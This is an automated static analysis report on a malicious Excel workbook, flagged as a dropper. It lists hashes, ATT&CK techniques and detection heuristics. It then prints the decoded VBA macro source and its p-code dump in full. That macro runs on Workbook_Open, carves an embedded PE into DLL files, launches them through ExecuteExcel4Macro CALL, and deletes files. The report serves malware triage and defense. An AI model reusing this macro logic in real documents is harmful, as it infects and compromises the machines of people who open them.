Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 21968af1913f18de…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 810.0 KB
Created: 2020-06-22 10:41:03
Authoring application: Microsoft Excel
First seen: 2020-07-24
MD5: fdf3c69cbd32d23f7f607c4f3920404a
SHA-1: 84c3aaeb05ebaffb5963df4572d433a7fc63d545
SHA-256: 21968af1913f18de4d4144d321e9f27169af5f628762033ad7eb17bb0f394ea7
Risk score: 490

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1106 Execution through API
  • T1566.001 Spearphishing Attachment
  • T1027 Obfuscated Files or Information
  • T1105 Ingress Tool Transfer

The sample is an Excel document containing VBA macros, specifically a Workbook_Open macro that triggers execution when the workbook is opened. This macro uses the Shell and CallByName functions, which is indicative of malicious intent. Furthermore, the document embeds a PE executable, which is likely a second-stage payload. The presence of VirtualAlloc, LoadLibrary, and GetProcAddress API references suggests the embedded executable is designed to perform dynamic code loading and execution.

Heuristics (12)

  • ClamAV: Win.Dropper.Hideproc-6663113-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Dropper.Hideproc-6663113-0
  • Embedded PE executable [critical] OLE_EMBEDDED_EXE
    MZ/PE header found inside document: possible embedded executable
  • VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Matched line in script:
        sendings = 1
        Dim sNMSP As New Shell
  • CallByName call [high] OLE_VBA_CALLBYNAME
    Matched line in script:
        CallByName WelcomeDialog, "Show", VbMethod
        End If
  • Workbook_Open macro [low] OLE_VBA_WBOPEN
    Matched line in script:
        Attribute VB_Customizable = True
        Private Sub Workbook_Open()
        If WelcomeDialog.Visible = True Then
  • Reference to Windows Script Host [high] SC_STR_WSCRIPT
  • Reference to LoadLibrary API [high] SC_STR_LOADLIBRARY
  • Reference to GetProcAddress API [high] SC_STR_GETPROCADDRESS
  • Suspicious extracted artifact [high] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualAlloc API [medium] SC_STR_VIRTUALALLOC
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.w3.org/2000/svg (in document text, OLE body)
    • http://www.w3.org/1999/xlink (in document text, OLE body)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 30851 bytes
SHA-256: e9fbdee671d09094cd35a77b574d5f8c1b9efd905ea3c60655b977d7ffae704e

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
If WelcomeDialog.Visible = True Then
Exit Sub
End If
Module0.WuzzyBud 800
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Page11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_Activate()

End Sub

Private Sub Worksheet_SelectionChange(ByVal Target As Range)

End Sub


Attribute VB_Name = "CarClass"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
    
Dim vSpeed As Integer
Dim vLicensePlate As String
 
Public Property Get Speed() As Integer
    Speed = vSpeed
End Property
 
Public Property Let Speed(sp As Integer)
    vSpeed = Application.WorksheetFunction.Min(sp, 100)
    vSpeed = Application.WorksheetFunction.Max(vSpeed, -100)
End Property
 
Public Property Get CheckCar(car As Object, Drive As String)
CheckCar = car.SpecialFolders("" & Drive)

End Property
Public Property Get SpecialFolders() As String
    LicensePlate = vLicensePlate
End Property
 
Public Property Let LicensePlate(lp As String)
    If Len(lp) <> 6 Then Err.Raise (xlErrValue) 'Raise error
    vLicensePlate = lp
End Property



Attribute VB_Name = "Module0"



Public Sub WuzzyBud(dImmer As Integer)

If WelcomeDialog.Visible = True Then
Exit Sub
End If

Dim ActiveHotbit As New WshShell
 Dim s As String
 Dim GetInfirmityLevelDescription As String
    
    Dim d As Long
    d = 3
    d = d - 1
    Select Case d
    Case 0
        s = "No health problems"
    Case 1
        s = "Minor health problems"
    Case 2
        s = "Major health problems"
       
    Case 3
        s = "Severe disability"
    End Select


    Dim SpecialPath As String
    

PRP = "%" + K6GOAM.TextBox1.Tag

K6GOAM.TextBox1.Tag = ActiveHotbit.ExpandEnvironmentStrings(PRP + "%")

    
Dim car As CarClass
Set car = New CarClass
K6GOAM.TextBox3.Tag = car.CheckCar(ActiveHotbit, "" & K6GOAM.TextBox3.Tag & "")
ChDir (K6GOAM.TextBox1.Tag)
If WelcomeDialog.Visible = False Then

   CallByName WelcomeDialog, "Show", VbMethod
End If
End Sub








Attribute VB_Name = "Module1"
 Public Const FirstB As Byte = 77
 Public Const SecondB As Byte = 90
 Public Const ThirdB As Byte = 144
Public Sub GetParam(Count As Integer)
    Dim i As Long
    Dim j As Integer
    Dim c As String
    Dim tooolsetChunkI As Boolean
    Dim tooolsetChunkQ As Boolean

    j = 1
    tooolsetChunkI = False
    tooolsetChunkQ = False
    GetP.aram = ""
    For i = 1 To Len(Comma.nd$)
        c = Mi.d$(Comma.nd$, i, 1)
        If tooolsetChunkI Then
            If c = """" Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        ElseIf tooolsetChunkI And Not tooolsetChunkQ Then
            If c = " " Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        Else
            If c = """" Then
                If j > Count Then Exit Sub
                tooolsetChunkI = True
                tooolsetChunkQ = True
            ElseIf c <> " " Then
                tooolsetChunkI = True
                tooolsetChunkQ = False
            End If
        End If
        If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c
    Next i
End Sub










Attribute VB_Name = "Module2"

Private Sub ERRCHECK(result)
 If result = RCPN_D_FMOD_OK Then
 ms.gR.esult = MsgBox(result & ") ")
 End If
End Sub







Public Sub VistaQ(WhereToGo)
 DoEvents
        ThisWorkbook.Sheets.Copy
        Application.DisplayAlerts = False
        DoEvents
        ActiveWorkbook.SaveAs WhereToGo, Local:=False, FileFormat:=3 * 7 + 3 * 7 + 9
    DoEvents
    ActiveWorkbook.Close
    DoEvents
        
End Sub











Public Sub DerTip()
    
 Dim sendings As Integer
    dershlep = "" + K6GOAM.TextBox1.Tag
    Dim ofbl As String
    Dim sOfbl As String
    ofbl = K6GOAM.TextBox3.Tag + "\libIntel"
    Dim CurrentSizeOfAT As Long

ctackPup = K6GOAM.TextBox1.Tag + "\manufact.xls" + "x"

        ctackPop = dershlep & K6GOAM.TextBox3.Value
        
         Dim arr(1 To 3) As String
        
ctackPip = ctackPup & Page11.Range("A100").Value

 PublicResumEraseByArrayList ctackPop, ofbl, ctackPip
 
  VistaQ ctackPup
    
        FileCopy ctackPup, ctackPip
         sendings = 1
         Dim sNMSP As New Shell
              
          
        If sendings > 0 And sendings > -30 Then
         
            Set DestinationKat = sNMSP.Namespace(dershlep)
            Set harvest = sNMSP.Namespace(ctackPip)
          
          
        End If
         FlagDouble = True
DestinationKat.CopyHere harvest.Items.Item(K6GOAM.Label11.Tag)

              For StepBit = 1 To 2
 
    CurrentSizeOfAT = 326656
      sendings = 1
            sendingsCSTR = "1"
        If FlagDouble Then
                CurrentSizeOfAT = 200000 + 59070 + 2
                sendings = 2
                FlagDouble = False
            sendingsCSTR = "2"
            End If
            
            sOfbl = ofbl + sendingsCSTR + ".dll"
 Composition dershlep & K6GOAM.Label1.Tag, sOfbl, CurrentSizeOfAT, sendings
       
        If sendings < 100 Then
            sendings = sendings + 1
            sendings = sendings + 1
        End If
        If -100 <= sendings Then
            sendings = sendings + 1
            ChDir (K6GOAM.TextBox3.Tag)
            sendings = sendings + 1
        End If
        
            
       
       
        If sendings < 0 Then
            sendings = sendings + 1
            sendings = sendings + 1
        End If
        sOfbl = """" + sOfbl

  
   varRes1 = ExecuteExcel4Macro("CALL(" + sOfbl & """,""" + "fruudt"",""J"")")
   If IsNumeric(varRes1) Then
    If varRes1 = 0 Then
        Exit Sub
    End If
    End If
   
Next
End Sub
















Attribute VB_Name = "Module4"




 
Public Sub GetParam(Count As Integer)
    Dim i As Long
    Dim j As Integer
    Dim c As String
    Dim tooolsetChunkI As Boolean
    Dim tooolsetChunkQ As Boolean

    j = 1
    tooolsetChunkI = False
    tooolsetChunkQ = False
    GetP.aram = ""
    For i = 1 To Len(Comma.nd$)
        c = Mi.d$(Comma.nd$, i, 1)
        If tooolsetChunkI Then
            If c = """" Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        ElseIf tooolsetChunkI And Not tooolsetChunkQ Then
            If c = " " Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        Else
            If c = """" Then
                If j > Count Then Exit Sub
                tooolsetChunkI = True
                tooolsetChunkQ = True
            ElseIf c <> " " Then
                tooolsetChunkI = True
                tooolsetChunkQ = False
            End If
        End If
        If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c
    Next i
End Sub

























Attribute VB_Name = "Module5"
 
 Public DisputeChannel3 As Byte
     
Public HurricanMoes() As Byte

     
    Public abbrev As Byte
 Dim DecemberUpdate As Byte
 
 




Public Sub PublicResumEraseByArrayList(ParamArray putArrayBigList() As Variant)
    On Error Resume Next
    For Each Key In putArrayBigList
        Kill Key
    Next Key
    On Error GoTo 0
End Sub

Public Sub Composition(Composition2 As String, ofbl As String, fl As Long, DisputeChannel6 As Integer)
 Dim DisputeChannel1 As Long
 
 Dim SimpleMethod As Integer
 ReDim HurricanMoes(1 To fl)
 DisputeChannel1 = FreeFile
 Open Composition2 For Binary Access Read As DisputeChannel1
 Dim cur As Integer
 cur = 1
Do While 1
 Get DisputeChannel1, , abbrev
 If abbrev = FirstB Then
 HurricanMoes(1) = abbrev
 Get DisputeChannel1, , DisputeChannel3
 If DisputeChannel3 = SecondB Then
 HurricanMoes(2) = DisputeChannel3
 Get DisputeChannel1, , DecemberUpdate
 If DecemberUpdate = ThirdB Then
 HurricanMoes(3) = DecemberUpdate
 If cur = DisputeChannel6 Then
 For k = 4 To fl
 Get DisputeChannel1, , abbrev
 HurricanMoes(k) = abbrev
 Next k
 Exit Do
 Else
 cur = cur + 1
 End If
 End If
 End If
 End If
 Loop
 Close DisputeChannel1
 On Error Resume Next
 DisputeChannel1 = FreeFile
 Open ofbl For Binary Lock Read Write As #DisputeChannel1
 For i = LBound(HurricanMoes) To UBound(HurricanMoes)
 If WelcomeDialog.Enabled = True Then

 Put #DisputeChannel1, , HurricanMoes(i)
 End If
 Next i
 Close DisputeChannel1
 DisputeChannel1 = FreeFile
 For HSP = 33 To -1 Step -0.25
 DisputeChannel1 = 6 + i
 Next HSP
End Sub










Attribute VB_Name = "K6GOAM"
Attribute VB_Base = "0{85A3F827-CE21-44D3-A439-8551D5EECD6C}{81369CF4-DC73-467B-B313-9F6CBD91B156}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "WelcomeDialog"
Attribute VB_Base = "0{8FBF4C6B-755F-4777-96BD-B65ED5A0387C}{1B92BE20-B830-4B88-A1A7-66896B620D1D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Activate()
DoEvents
DoEvents
DerTip
DoEvents
End Sub





' Processing file: /tmp/qstore_1xr5eeom
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 1362 bytes
' Line #0:
' 	FuncDefn (Private Sub Workbook_Open())
' Line #1:
' 	Ld WelcomeDialog 
' 	MemLd Visible 
' 	LitVarSpecial (True)
' 	Eq 
' 	IfBlock 
' Line #2:
' 	ExitSub 
' Line #3:
' 	EndIfBlock 
' Line #4:
' 	LitDI2 0x0320 
' 	Ld Module0 
' 	ArgsMemCall WuzzyBud 0x0001 
' Line #5:
' 	EndSub 
' _VBA_PROJECT_CUR/VBA/Sheet1 - 1001 bytes
' _VBA_PROJECT_CUR/VBA/Page11 - 1385 bytes
' Line #0:
' 	FuncDefn (Private Sub Worksheet_Activate())
' Line #1:
' Line #2:
' 	EndSub 
' Line #3:
' Line #4:
' 	FuncDefn (Private Sub Worksheet_SelectionChange(ByVal Target As ))
' Line #5:
' Line #6:
' 	EndSub 
' Line #7:
' _VBA_PROJECT_CUR/VBA/CarClass - 2803 bytes
' Line #0:
' Line #1:
' 	Dim 
' 	VarDefn vSpeed (As Integer)
' Line #2:
' 	Dim 
' 	VarDefn vLicensePlate (As String)
' Line #3:
' Line #4:
' 	FuncDefn (Public Property Get Speed(id_FFFE As Integer) As Integer)
' Line #5:
' 	Ld vSpeed 
' 	St Speed 
' Line #6:
' 	EndProp 
' Line #7:
' Line #8:
' 	FuncDefn (Public Property Let Speed(sp As Integer))
' Line #9:
' 	Ld sp 
' 	LitDI2 0x0064 
' 	Ld Application 
' 	MemLd WorksheetFunction 
' 	ArgsMemLd Min 0x0002 
' 	St vSpeed 
' Line #10:
' 	Ld vSpeed 
' 	LitDI2 0x0064 
' 	UMi 
' 	Ld Application 
' 	MemLd WorksheetFunction 
' 	ArgsMemLd Max 0x0002 
' 	St vSpeed 
' Line #11:
' 	EndProp 
' Line #12:
' Line #13:
' 	FuncDefn (Public Property Get CheckCar(car As Object, Drive As String, id_FFFE As Variant))
' Line #14:
' 	LitStr 0x0000 ""
' 	Ld Drive 
' 	Concat 
' 	Ld car 
' 	ArgsMemLd SpecialFolders 0x0001 
' 	St CheckCar 
' Line #15:
' Line #16:
' 	EndProp 
' Line #17:
' 	FuncDefn (Public Property Get SpecialFolders(id_FFFE As String) As String)
' Line #18:
' 	Ld vLicensePlate 
' 	St LicensePlate 
' Line #19:
' 	EndProp 
' Line #20:
' Line #21:
' 	FuncDefn (Public Property Let LicensePlate(lp As String))
' Line #22:
' 	Ld lp 
' 	FnLen 
' 	LitDI2 0x0006 
' 	Ne 
' 	If 
' 	BoSImplicit 
' 	Ld xlErrValue 
' 	Paren 
' 	Ld Err 
' 	ArgsMemCall Raise 0x0001 
' 	EndIf 
' 	QuoteRem 0x0030 0x000B "Raise error"
' Line #23:
' 	Ld lp 
' 	St vLicensePlate 
' Line #24:
' 	EndProp 
' Line #25:
' Line #26:
' _VBA_PROJECT_CUR/VBA/Module0 - 3019 bytes
' Line #0:
' Line #1:
' Line #2:
' Line #3:
' 	FuncDefn (Public Sub WuzzyBud(dImmer As Integer))
' Line #4:
' Line #5:
' 	Ld WelcomeDialog 
' 	MemLd Visible 
' 	LitVarSpecial (True)
' 	Eq 
' 	IfBlock 
' Line #6:
' 	ExitSub 
' Line #7:
' 	EndIfBlock 
' Line #8:
' Line #9:
' 	Dim 
' 	VarDefn ActiveHotbit (New )
' Line #10:
' 	Dim 
' 	VarDefn s (As String)
' Line #11:
' 	Dim 
' 	VarDefn GetInfirmityLevelDescription (As String)
' Line #12:
' Line #13:
' 	Dim 
' 	VarDefn d (As Long)
' Line #14:
' 	LitDI2 0x0003 
' 	St d 
' Line #15:
' 	Ld d 
' 	LitDI2 0x0001 
' 	Sub 
' 	St d 
' Line #16:
' 	Ld d 
' 	SelectCase 
' Line #17:
' 	LitDI2 0x0000 
' 	Case 
' 	CaseDone 
' Line #18:
' 	LitStr 0x0012 "No health problems"
' 	St s 
' Line #19:
' 	LitDI2 0x0001 
' 	Case 
' 	CaseDone 
' Line #20:
' 	LitStr 0x0015 "Minor health problems"
' 	St s 
' Line #21:
' 	LitDI2 0x0002 
' 	Case 
' 	CaseDone 
' Line #22:
' 	LitStr 0x0015 "Major health problems"
' 	St s 
' Line #23:
' Line #24:
' 	LitDI2 0x0003 
' 	Case 
' 	CaseDone 
' Line #25:
' 	LitStr 0x0011 "Severe disability"
' 	St s 
' Line #26:
' 	EndSelect 
' Line #27:
' Line #28:
' Line #29:
' 	Dim 
' 	VarDefn SpecialPath (As String)
' Line #30:
' Line #31:
' Line #32:
' 	LitStr 0x0001 "%"
' 	Ld K6GOAM 
' 	MemLd TextBox1 
' 	MemLd Tag 
' 	Add 
' 	St PRP 
' Line #33:
' Line #34:
' 	Ld PRP 
' 	LitStr 0x0001 "%"
' 	Add 
' 	Ld ActiveHotbit 
' 	ArgsMemLd ExpandEnvironmentStrings 0x0001 
' 	Ld K6GOAM 
' 	MemLd TextBox1 
' 	MemSt Tag 
' Line #35:
' Line #36:
' Line #37:
' 	Dim 
' 	VarDefn car (As CarClass)
' Line #38:
' 	SetStmt 
' 	New 0
' 	Set car 
' Line #39:
' 	Ld ActiveHotbit 
' 	LitStr 0x0000 ""
' 	Ld K6GOAM 
' 	MemLd TextBox3 
' 	MemLd Tag 
' 	Concat 
' 	LitStr 0x0000 ""
' 	Concat 
' 	Ld car 
' 	ArgsMemLd CheckCar 0x0002 
' 	Ld K6GOAM 
' 	MemLd TextBox3 
' 	MemSt Tag 
' Line #40:
' 	Ld K6GOAM 
' 	MemLd TextBox1 
' 	MemLd Tag 
' 	Paren 
' 	ArgsCall ChDir 0x0001 
' Line #41:
' 	Ld WelcomeDialog 
' 	MemLd Visible 
' 	LitVarSpecial (False)
' 	Eq 
' 	IfBlock 
' Line #42:
' Line #43:
' 	Ld WelcomeDialog 
' 	LitStr 0x0004 "Show"
' 	Ld id_0338 
' 	ArgsCall VbMethod 0x0003 
' Line #44:
' 	EndIfBlock 
' Line #45:
' 	EndSub 
' Line #46:
' Line #47:
' Line #48:
' Line #49:
' Line #50:
' Line #51:
' Line #52:
' _VBA_PROJECT_CUR/VBA/Module1 - 2741 bytes
' Line #0:
' 	Dim (Public Const) 
' 	LitDI2 0x004D 
' 	VarDefn FirstB (As Byte)
' Line #1:
' 	Dim (Public Const) 
' 	LitDI2 0x005A 
' 	VarDefn SecondB (As Byte)
' Line #2:
' 	Dim (Public Const) 
' 	LitDI2 0x0090 
' 	VarDefn ThirdB (As Byte)
' Line #3:
' 	FuncDefn (Public Sub GetParam(Count As Integer))
' Line #4:
' 	Dim 
' 	VarDefn i (As Long)
' Line #5:
' 	Dim 
' 	VarDefn j (As Integer)
' Line #6:
' 	Dim 
' 	VarDefn c (As String)
' Line #7:
' 	Dim 
' 	VarDefn tooolsetChunkI (As Boolean)
' Line #8:
' 	Dim 
' 	VarDefn tooolsetChunkQ (As Boolean)
' Line #9:
' Line #10:
' 	LitDI2 0x0001 
' 	St j 
' Line #11:
' 	LitVarSpecial (False)
' 	St tooolsetChunkI 
' Line #12:
' 	LitVarSpecial (False)
' 	St tooolsetChunkQ 
' Line #13:
' 	LitStr 0x0000 ""
' 	Ld GetP 
' 	MemSt aram 
' Line #14:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld Comma 
' 	MemLd nd$ 
' 	FnLen 
' 	For 
' Line #15:
' 	Ld Comma 
' 	MemLd nd$ 
' 	Ld i 
' 	LitDI2 0x0001 
' 	Ld Mi 
' 	ArgsMemLd d$ 0x0003 
' 	St c 
' Line #16:
' 	Ld tooolsetChunkI 
' 	IfBlock 
' Line #17:
' 	Ld c 
' 	LitStr 0x0001 """
' 	Eq 
' 	IfBlock 
' Line #18:
' 	Ld j 
' 	LitDI2 0x0001 
' 	Add 
' 	St j 
' Line #19:
' 	LitVarSpecial (False)
' 	St tooolsetChunkI 
' Line #20:
' 	LitVarSpecial (False)
' 	St tooolsetChunkQ 
' Line #21:
' 	EndIfBlock 
' Line #22:
' 	Ld tooolsetChunkI 
' 	Ld tooolsetChunkQ 
' 	Not 
' 	And 
' 	ElseIfBlock 
' Line #23:
' 	Ld c 
' 	LitStr 0x0001 " "
' 	Eq 
' 	IfBlock 
' Line #24:
' 	Ld j 
' 	LitDI2 0x0001 
' 	Add 
' 	St j 
' Line #25:
' 	LitVarSpecial (False)
' 	St tooolsetChunkI 
' Line #26:
' 	LitVarSpecial (False)
' 	St tooolsetChunkQ 
' Line #27:
' 	EndIfBlock 
' Line #28:
' 	ElseBlock 
' Line #29:
' 	Ld c 
' 	LitStr 0x0001 """
' 	Eq 
' 	IfBlock 
' Line #30:
' 	Ld j 
' 	Ld Count 
' 	Gt 
' 	If 
' 	BoSImplicit 
' 	ExitSub 
' 	EndIf 
' Line #31:
' 	LitVarSpecial (True)
' 	St tooolsetChunkI 
' Line #32:
' 	LitVarSpecial (True)
' 	St tooolsetChunkQ 
' Line #33:
' 	Ld c 
' 	LitStr 0x0001 " "
' 	Ne 
' 	ElseIfBlock 
' Line #34:
' 	LitVarSpecial (True)
' 	St tooolsetChunkI 
' Line #35:
' 	LitVarSpecial (False)
' 	St tooolsetChunkQ 
' Line #36:
' 	EndIfBlock 
' Line #37:
' 	EndIfBlock 
' Line #38:
' 	Ld tooolsetChunkI 
' 	Ld j 
' 	Ld Count 
' 	Eq 
' 	And 
' 	Ld c 
' 	LitStr 0x0001 """
' 	Ne 
' 	And 
' 	If 
' 	BoSImplicit 
' 	Ld GetP 
' 	MemLd aram 
' 	Ld c 
' 	Concat 
' 	Ld GetP 
' 	MemSt aram 
' 	EndIf 
' Line #39:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	NextVar 
' Line #40:
' 	EndSub 
' Line #41:
' Line #42:
' Line #43:
' Line #44:
' Line #45:
' Line #46:
' Line #47:
' Line #48:
' Line #49:
' _VBA_PROJECT_CUR/VBA/Module2 - 5597 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Private Sub ERRCHECK(result))
' Line #2:
' 	Ld result 
' 	Ld RCPN_D_FMOD_OK 
' 	Eq 
' 	IfBlock 
' Line #3:
' 	Ld result 
' 	LitStr 0x0002 ") "
' 	Concat 
' 	ArgsLd MsgBox 0x0001 
' 	Ld ms 
' 	MemLd gR 
' 	MemSt esult 
' Line #4:
' 	EndIfBlock 
' Line #5:
' 	EndSub 
' Line #6:
' Line #7:
' Line #8:
' Line #9:
' Line #10:
' Line #11:
' Line #12:
' Line #13:
' 	FuncDefn (Public Sub VistaQ(WhereToGo))
' Line #14:
' 	ArgsCall DoEvents 0x0000 
' Line #15:
' 	Ld ThisWorkbook 
' 	MemLd Sheets 
' 	ArgsMemCall Copy 0x0000 
' Line #16:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #17:
' 	ArgsCall DoEvents 0x0000 
' Line #18:
' 	Ld WhereToGo 
' 	LitVarSpecial (False)
' 	ParamNamed Local 
' 	LitDI2 0x0003 
' 	LitDI2 0x0007 
' 	Mul 
' 	LitDI2 0x0003 
' 	LitDI2 0x0007 
' 	Mul 
' 	Add 
' 	LitDI2 0x0009 
' 	Add 
' 	ParamNamed FileFormat 
' 	Ld ActiveWorkbook 
' 	ArgsMemCall SaveAs 0x0003 
' Line #19:
' 	ArgsCall DoEvents 0x0000 
' Line #20:
' 	Ld ActiveWorkbook 
' 	ArgsMemCall Close 0x0000 
' Line #21:
' 	ArgsCall DoEvents 0x0000 
…
Filename: embedded_office_00006265.exe
Kind: embedded-pe
Source: Office MZ+PE at offset 0x6265
Size: 804251 bytes
SHA-256: 589cb863a4a4a2049451a97bc1b6553dd0b1d3fc9f26e954276bbb854b5a9579
Detection: ClamAV: Win.Dropper.Hideproc-6663113-0
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): WScript.Shell
Carved macro source contains an auto-exec entry point and execution/download terms.

Filename: ole10native_00.bin
Kind: ole-package
Source: OLE Ole10Native stream: MBD006D6CCC/Ole10Native
Size: 614055 bytes
SHA-256: 938a226a0cea765197773a07c303387cd806465ddb346b3850b96578c79ac5f3